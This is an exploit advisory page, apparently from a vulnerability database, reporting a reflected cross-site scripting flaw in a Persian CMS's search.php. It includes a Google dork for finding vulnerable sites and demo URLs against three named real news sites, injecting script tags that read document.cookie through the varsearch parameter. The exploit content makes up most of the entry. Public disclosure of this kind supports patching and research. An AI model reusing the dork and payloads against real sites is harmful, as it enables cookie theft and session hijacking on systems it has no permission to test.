Ahrar Andeysheh Cross Site Scripting

Published
Credit
Risk
2017.02.05
Voldemort799
Low
CWE
CVE
Local
Remote
CWE-79
N/A
No
Yes
Dork: intext:"طراحی و تولید: مؤسسه احرار اندیشه" inurl:search.php

|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
|--------------------------------------------------------------|
|[+] Exploit Title: Ahrar Andeysheh Cross Site Scripting
|[+]
|[+] Google Dork: intext:"طراحی و تولید: مؤسسه احرار اندیشه" inurl:search.php
|[+]
|[+] Discovered By: Voldemort799
|[+]
|[+] Vendor Homepage : http://www.ahrareandeysheh.ir/
|--------------------------------------------------------------|
|[+] {DEMO}
|[+]
|[+] http://sabernews.com/search.php?varsearch=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E
|[+]
|[+] http://atabe.ir/search.php?varsearch=%3Cscript%3Ealert(%22voldemort799%22)%3C%2Fscript%3E
|[+]
|[+] http://enghelab-news.ir/search.php?varsearch=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E

|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
|[+]Thanks to : Hack4lx - shayan 72
|[+] voldemort799@gmail.com
|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com